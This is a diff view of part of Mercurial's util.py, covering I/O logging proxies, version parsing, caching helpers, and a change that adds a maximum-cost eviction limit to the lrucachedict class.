662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keywords args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220 self.cost = 0
1221 1221
1222 1222 def markempty(self):
1223 1223 """Mark the node as emptied."""
1224 1224 self.key = _notset
1225 1225 self.value = None
1226 1226 self.cost = 0
1227 1227
1228 1228 class lrucachedict(object):
1229 1229 """Dict that caches most recent accesses and sets.
1230 1230
1231 1231 The dict consists of an actual backing dict - indexed by original
1232 1232 key - and a doubly linked circular list defining the order of entries in
1233 1233 the cache.
1234 1234
1235 1235 The head node is the newest entry in the cache. If the cache is full,
1236 1236 we recycle head.prev and make it the new head. Cache accesses result in
1237 1237 the node being moved to before the existing head and being marked as the
1238 1238 new head node.
1239 1239
1240 1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 1241 simply an integer that is specified by the caller. The cache can be queried
1242 1242 for the total cost of all items presently in the cache.
1243
1244 The cache can also define a maximum cost. If a cache insertion would
1245 cause the total cost of the cache to go beyond the maximum cost limit,
1246 nodes will be evicted to make room for the new code. This can be used
1247 to e.g. set a max memory limit and associate an estimated bytes size
1248 cost to each item in the cache. By default, no maximum cost is enforced.
1243 1249 """
1244 def __init__(self, max):
1250 def __init__(self, max, maxcost=0):
1245 1251 self._cache = {}
1246 1252
1247 1253 self._head = head = _lrucachenode()
1248 1254 head.prev = head
1249 1255 head.next = head
1250 1256 self._size = 1
1251 1257 self.capacity = max
1252 1258 self.totalcost = 0
1259 self.maxcost = maxcost
1253 1260
1254 1261 def __len__(self):
1255 1262 return len(self._cache)
1256 1263
1257 1264 def __contains__(self, k):
1258 1265 return k in self._cache
1259 1266
1260 1267 def __iter__(self):
1261 1268 # We don't have to iterate in cache order, but why not.
1262 1269 n = self._head
1263 1270 for i in range(len(self._cache)):
1264 1271 yield n.key
1265 1272 n = n.next
1266 1273
1267 1274 def __getitem__(self, k):
1268 1275 node = self._cache[k]
1269 1276 self._movetohead(node)
1270 1277 return node.value
1271 1278
1272 1279 def insert(self, k, v, cost=0):
1273 1280 """Insert a new item in the cache with optional cost value."""
1274 1281 node = self._cache.get(k)
1275 1282 # Replace existing value and mark as newest.
1276 1283 if node is not None:
1277 1284 self.totalcost -= node.cost
1278 1285 node.value = v
1279 1286 node.cost = cost
1280 1287 self.totalcost += cost
1281 1288 self._movetohead(node)
1289
1290 if self.maxcost:
1291 self._enforcecostlimit()
1292
1282 1293 return
1283 1294
1284 1295 if self._size < self.capacity:
1285 1296 node = self._addcapacity()
1286 1297 else:
1287 1298 # Grab the last/oldest item.
1288 1299 node = self._head.prev
1289 1300
1290 1301 # At capacity. Kill the old entry.
1291 1302 if node.key is not _notset:
1292 1303 self.totalcost -= node.cost
1293 1304 del self._cache[node.key]
1294 1305
1295 1306 node.key = k
1296 1307 node.value = v
1297 1308 node.cost = cost
1298 1309 self.totalcost += cost
1299 1310 self._cache[k] = node
1300 1311 # And mark it as newest entry. No need to adjust order since it
1301 1312 # is already self._head.prev.
1302 1313 self._head = node
1303 1314
1315 if self.maxcost:
1316 self._enforcecostlimit()
1317
1304 1318 def __setitem__(self, k, v):
1305 1319 self.insert(k, v)
1306 1320
1307 1321 def __delitem__(self, k):
1308 1322 node = self._cache.pop(k)
1309 1323 self.totalcost -= node.cost
1310 1324 node.markempty()
1311 1325
1312 1326 # Temporarily mark as newest item before re-adjusting head to make
1313 1327 # this node the oldest item.
1314 1328 self._movetohead(node)
1315 1329 self._head = node.next
1316 1330
1317 1331 # Additional dict methods.
1318 1332
1319 1333 def get(self, k, default=None):
1320 1334 try:
1321 1335 return self._cache[k].value
1322 1336 except KeyError:
1323 1337 return default
1324 1338
1325 1339 def clear(self):
1326 1340 n = self._head
1327 1341 while n.key is not _notset:
1328 1342 self.totalcost -= n.cost
1329 1343 n.markempty()
1330 1344 n = n.next
1331 1345
1332 1346 self._cache.clear()
1333 1347
1334 def copy(self, capacity=None):
1348 def copy(self, capacity=None, maxcost=0):
1335 1349 """Create a new cache as a copy of the current one.
1336 1350
1337 1351 By default, the new cache has the same capacity as the existing one.
1338 1352 But, the cache capacity can be changed as part of performing the
1339 1353 copy.
1340 1354
1341 1355 Items in the copy have an insertion/access order matching this
1342 1356 instance.
1343 1357 """
1344 1358
1345 1359 capacity = capacity or self.capacity
1346 result = lrucachedict(capacity)
1360 maxcost = maxcost or self.maxcost
1361 result = lrucachedict(capacity, maxcost=maxcost)
1347 1362
1348 1363 # We copy entries by iterating in oldest-to-newest order so the copy
1349 1364 # has the correct ordering.
1350 1365
1351 1366 # Find the first non-empty entry.
1352 1367 n = self._head.prev
1353 1368 while n.key is _notset and n is not self._head:
1354 1369 n = n.prev
1355 1370
1356 1371 # We could potentially skip the first N items when decreasing capacity.
1357 1372 # But let's keep it simple unless it is a performance problem.
1358 1373 for i in range(len(self._cache)):
1359 1374 result.insert(n.key, n.value, cost=n.cost)
1360 1375 n = n.prev
1361 1376
1362 1377 return result
1363 1378
1364 1379 def popoldest(self):
1365 1380 """Remove the oldest item from the cache.
1366 1381
1367 1382 Returns the (key, value) describing the removed cache entry.
1368 1383 """
1369 1384 if not self._cache:
1370 1385 return
1371 1386
1372 1387 # Walk the linked list backwards starting at tail node until we hit
1373 1388 # a non-empty node.
1374 1389 n = self._head.prev
1375 1390 while n.key is _notset:
1376 1391 n = n.prev
1377 1392
1378 1393 key, value = n.key, n.value
1379 1394
1380 1395 # And remove it from the cache and mark it as empty.
1381 1396 del self._cache[n.key]
1382 1397 self.totalcost -= n.cost
1383 1398 n.markempty()
1384 1399
1385 1400 return key, value
1386 1401
1387 1402 def _movetohead(self, node):
1388 1403 """Mark a node as the newest, making it the new head.
1389 1404
1390 1405 When a node is accessed, it becomes the freshest entry in the LRU
1391 1406 list, which is denoted by self._head.
1392 1407
1393 1408 Visually, let's make ``N`` the new head node (* denotes head):
1394 1409
1395 1410 previous/oldest <-> head <-> next/next newest
1396 1411
1397 1412 ----<->--- A* ---<->-----
1398 1413 | |
1399 1414 E <-> D <-> N <-> C <-> B
1400 1415
1401 1416 To:
1402 1417
1403 1418 ----<->--- N* ---<->-----
1404 1419 | |
1405 1420 E <-> D <-> C <-> B <-> A
1406 1421
1407 1422 This requires the following moves:
1408 1423
1409 1424 C.next = D (node.prev.next = node.next)
1410 1425 D.prev = C (node.next.prev = node.prev)
1411 1426 E.next = N (head.prev.next = node)
1412 1427 N.prev = E (node.prev = head.prev)
1413 1428 N.next = A (node.next = head)
1414 1429 A.prev = N (head.prev = node)
1415 1430 """
1416 1431 head = self._head
1417 1432 # C.next = D
1418 1433 node.prev.next = node.next
1419 1434 # D.prev = C
1420 1435 node.next.prev = node.prev
1421 1436 # N.prev = E
1422 1437 node.prev = head.prev
1423 1438 # N.next = A
1424 1439 # It is tempting to do just "head" here, however if node is
1425 1440 # adjacent to head, this will do bad things.
1426 1441 node.next = head.prev.next
1427 1442 # E.next = N
1428 1443 node.next.prev = node
1429 1444 # A.prev = N
1430 1445 node.prev.next = node
1431 1446
1432 1447 self._head = node
1433 1448
1434 1449 def _addcapacity(self):
1435 1450 """Add a node to the circular linked list.
1436 1451
1437 1452 The new node is inserted before the head node.
1438 1453 """
1439 1454 head = self._head
1440 1455 node = _lrucachenode()
1441 1456 head.prev.next = node
1442 1457 node.prev = head.prev
1443 1458 node.next = head
1444 1459 head.prev = node
1445 1460 self._size += 1
1446 1461 return node
1447 1462
1463 def _enforcecostlimit(self):
1464 # This should run after an insertion. It should only be called if total
1465 # cost limits are being enforced.
1466 # The most recently inserted node is never evicted.
1467 while len(self) > 1 and self.totalcost > self.maxcost:
1468 self.popoldest()
1469
1448 1470 def lrucachefunc(func):
1449 1471 '''cache most recent results of function calls'''
1450 1472 cache = {}
1451 1473 order = collections.deque()
1452 1474 if func.__code__.co_argcount == 1:
1453 1475 def f(arg):
1454 1476 if arg not in cache:
1455 1477 if len(cache) > 20:
1456 1478 del cache[order.popleft()]
1457 1479 cache[arg] = func(arg)
1458 1480 else:
1459 1481 order.remove(arg)
1460 1482 order.append(arg)
1461 1483 return cache[arg]
1462 1484 else:
1463 1485 def f(*args):
1464 1486 if args not in cache:
1465 1487 if len(cache) > 20:
1466 1488 del cache[order.popleft()]
1467 1489 cache[args] = func(*args)
1468 1490 else:
1469 1491 order.remove(args)
1470 1492 order.append(args)
1471 1493 return cache[args]
1472 1494
1473 1495 return f
1474 1496
1475 1497 class propertycache(object):
1476 1498 def __init__(self, func):
1477 1499 self.func = func
1478 1500 self.name = func.__name__
1479 1501 def __get__(self, obj, type=None):
1480 1502 result = self.func(obj)
1481 1503 self.cachevalue(obj, result)
1482 1504 return result
1483 1505
1484 1506 def cachevalue(self, obj, value):
1485 1507 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1486 1508 obj.__dict__[self.name] = value
1487 1509
1488 1510 def clearcachedproperty(obj, prop):
1489 1511 '''clear a cached property value, if one has been set'''
1490 1512 if prop in obj.__dict__:
1491 1513 del obj.__dict__[prop]
1492 1514
1493 1515 def increasingchunks(source, min=1024, max=65536):
1494 1516 '''return no less than min bytes per chunk while data remains,
1495 1517 doubling min after each chunk until it reaches max'''
1496 1518 def log2(x):
1497 1519 if not x:
1498 1520 return 0
1499 1521 i = 0
1500 1522 while x:
1501 1523 x >>= 1
1502 1524 i += 1
1503 1525 return i - 1
1504 1526
1505 1527 buf = []
1506 1528 blen = 0
1507 1529 for chunk in source:
1508 1530 buf.append(chunk)
1509 1531 blen += len(chunk)
1510 1532 if blen >= min:
1511 1533 if min < max:
1512 1534 min = min << 1
1513 1535 nmin = 1 << log2(blen)
1514 1536 if nmin > min:
1515 1537 min = nmin
1516 1538 if min > max:
1517 1539 min = max
1518 1540 yield ''.join(buf)
1519 1541 blen = 0
1520 1542 buf = []
1521 1543 if buf:
1522 1544 yield ''.join(buf)
1523 1545
1524 1546 def always(fn):
1525 1547 return True
1526 1548
1527 1549 def never(fn):
1528 1550 return False
1529 1551
1530 1552 def nogc(func):
1531 1553 """disable garbage collector
1532 1554
1533 1555 Python's garbage collector triggers a GC each time a certain number of
1534 1556 container objects (the number being defined by gc.get_threshold()) are
1535 1557 allocated even when marked not to be tracked by the collector. Tracking has
1536 1558 no effect on when GCs are triggered, only on what objects the GC looks
1537 1559 into. As a workaround, disable GC while building complex (huge)
1538 1560 containers.
1539 1561
1540 1562 This garbage collector issue have been fixed in 2.7. But it still affect
1541 1563 CPython's performance.
1542 1564 """
1543 1565 def wrapper(*args, **kwargs):
1544 1566 gcenabled = gc.isenabled()
1545 1567 gc.disable()
1546 1568 try:
1547 1569 return func(*args, **kwargs)
1548 1570 finally:
1549 1571 if gcenabled:
1550 1572 gc.enable()
1551 1573 return wrapper
1552 1574
1553 1575 if pycompat.ispypy:
1554 1576 # PyPy runs slower with gc disabled
1555 1577 nogc = lambda x: x
1556 1578
1557 1579 def pathto(root, n1, n2):
1558 1580 '''return the relative path from one place to another.
1559 1581 root should use os.sep to separate directories
1560 1582 n1 should use os.sep to separate directories
1561 1583 n2 should use "/" to separate directories
1562 1584 returns an os.sep-separated path.
1563 1585
1564 1586 If n1 is a relative path, it's assumed it's
1565 1587 relative to root.
1566 1588 n2 should always be relative to root.
1567 1589 '''
1568 1590 if not n1:
1569 1591 return localpath(n2)
1570 1592 if os.path.isabs(n1):
1571 1593 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1572 1594 return os.path.join(root, localpath(n2))
1573 1595 n2 = '/'.join((pconvert(root), n2))
1574 1596 a, b = splitpath(n1), n2.split('/')
1575 1597 a.reverse()
1576 1598 b.reverse()
1577 1599 while a and b and a[-1] == b[-1]:
1578 1600 a.pop()
1579 1601 b.pop()
1580 1602 b.reverse()
1581 1603 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1582 1604
1583 1605 # the location of data files matching the source code
1584 1606 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1585 1607 # executable version (py2exe) doesn't support __file__
1586 1608 datapath = os.path.dirname(pycompat.sysexecutable)
1587 1609 else:
1588 1610 datapath = os.path.dirname(pycompat.fsencode(__file__))
1589 1611
1590 1612 i18n.setdatapath(datapath)
1591 1613
1592 1614 def checksignature(func):
1593 1615 '''wrap a function with code to check for calling errors'''
1594 1616 def check(*args, **kwargs):
1595 1617 try:
1596 1618 return func(*args, **kwargs)
1597 1619 except TypeError:
1598 1620 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1599 1621 raise error.SignatureError
1600 1622 raise
1601 1623
1602 1624 return check
1603 1625
1604 1626 # a whilelist of known filesystems where hardlink works reliably
1605 1627 _hardlinkfswhitelist = {
1606 1628 'apfs',
1607 1629 'btrfs',
1608 1630 'ext2',
1609 1631 'ext3',
1610 1632 'ext4',
1611 1633 'hfs',
1612 1634 'jfs',
1613 1635 'NTFS',
1614 1636 'reiserfs',
1615 1637 'tmpfs',
1616 1638 'ufs',
1617 1639 'xfs',
1618 1640 'zfs',
1619 1641 }
1620 1642
1621 1643 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1622 1644 '''copy a file, preserving mode and optionally other stat info like
1623 1645 atime/mtime
1624 1646
1625 1647 checkambig argument is used with filestat, and is useful only if
1626 1648 destination file is guarded by any lock (e.g. repo.lock or
1627 1649 repo.wlock).
